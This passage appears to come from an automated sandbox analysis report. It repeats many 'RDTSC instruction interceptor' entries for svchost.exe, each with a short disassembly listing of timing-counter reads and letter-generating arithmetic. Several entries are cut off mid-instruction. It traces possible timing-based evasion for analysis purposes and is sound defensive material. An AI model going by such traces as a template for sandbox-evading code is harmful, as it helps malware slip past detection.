Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA591D0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59193h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F8F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59550h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F7F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FBB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4F876h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
